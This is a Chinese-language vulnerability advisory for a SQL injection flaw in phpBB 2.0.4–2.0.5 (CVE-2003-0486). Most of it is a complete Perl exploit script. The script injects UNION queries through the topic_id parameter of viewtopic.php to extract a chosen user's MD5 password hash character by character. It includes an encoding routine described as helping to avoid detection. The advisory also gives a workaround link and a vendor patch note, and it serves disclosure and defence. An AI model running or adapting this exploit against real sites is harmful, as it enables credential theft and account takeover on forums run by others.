发布日期：2003-06-20
更新日期：2003-06-27

受影响系统：

phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4

描述：

---

BUGTRAQ  ID: 7979
CVE(CAN) ID: CVE-2003-0486

phpBB是一款基于WEB的流行的论坛程序。

phpBB包含的viewtopic.php脚本不正确处理用户提交的请求，远程攻击者可以利用这个漏洞通过SQL注入攻击窃取用户敏感数据，或破坏数据库。

phpBB在调用viewtopic.php时，直接从GET请求中获得"topic_id"并传递给SQL查询命令中，因此，攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者进行暴力破解。

<*来源：Rick （rikul@bellsouth.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105607263130644&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Rick （rikul@bellsouth.net）提供了如下测试方法：

#!/usr/bin/perl -w
#
#
#       phpBB   password disclosure vuln.
#       - rick patel    (rikul7@yahoo.com) -
#
#       There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
#       which gets passed directly to sql server in query. Attacker could pass a special sql string which
#       can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
#       autologin or cracked using john.
#
#       Details:
#
#       this is checking done for $topic_id in viewtopic.php:
#
#       if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
#       {
#             $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
#       }
#       else if ( isset($HTTP_GET_VARS['topic']) )
#       {
#             $topic_id = intval($HTTP_GET_VARS['topic']);
#       }
#
#       ok... no else statement at end :)
#       now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
#               $sql = "SELECT p.post_id
#               FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s,  " . USERS_TABLE . " u
#               WHERE s.session_id = '$session_id'
#                  AND u.user_id = s.session_user_id
#                  AND p.topic_id = $topic_id
#                  AND p.post_time >= u.user_lastvisit
#               ORDER BY p.post_time ASC
#               LIMIT 1";
#
#       Ahh! $topic_id gets passed directy to query. So how can we use this to do something important? Well
#       I decided to use union and create a second query will get us something useful. There were couple of
#       problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
#       query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
#       there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
#       of our injected query. So what query can we make that returns only int?
#       this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id = $uid
#       Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
#       md5 hash password.
#
#       I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
#       the query to do anything useful.
#
#       This script is for educational purpose only. Please dont use it to do anything else.
#

use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift ||  '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;

$dbtype = 'mysql4';     # mysql4 or pgsql


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for($index=1; $index<=32; $index++)
{
        $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                PeerPort => $port,
                                Proto => "tcp",
                                Type => SOCK_STREAM)
        or die "Couldnt connect to $remote:$port : $@\n";
        $str = "GET $view_topic" . "?sid=1&topic_id=-1" .  random_encode(make_dbsql()) .  "&view=newest" . " HTTP/1.0\n\n";

        print $socket $str;
        print $socket "Cookie: phpBB2mysql_sid=1\n";    # replace this for pgsql or remove it
        print $socket "Host: $remote\n\n";

        while ($answer = <$socket>)
        {
                if ($answer =~ /Location:.*\x23(\d+)/)  # Matches the Location: viewtopic.php?p=<num>#<num>
                {
                        $p .= chr ($1);
                }
        }

        close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
        $str = shift;
        $ret = "";
        for($i=0; $i<length($str); $i++)
        {
                $c = substr($str,$i,1);
                $j = rand length($str) * 1000;

                if (int($j) % 2 || $c eq ' ')
                {
                        $ret .= "%" . sprintf("%x",ord($c));
                }
                else
                {
                        $ret .= $c;
                }
        }
        return $ret;
}

sub make_dbsql
{
        if ($dbtype eq 'mysql4')
        {
                return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
        } elsif ($dbtype eq 'pgsql')
        {
                return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
        }
        else
        {
                return "";
        }
}

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* lead developer of phpBB提供了暂时的解决方案，地址如下：

http://www.phpbb.com/phpBB/viewtopic.php?t=112052

厂商补丁：

phpBB Group
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpbb.com/

浏览次数：5249
严重程度：0（网友投票）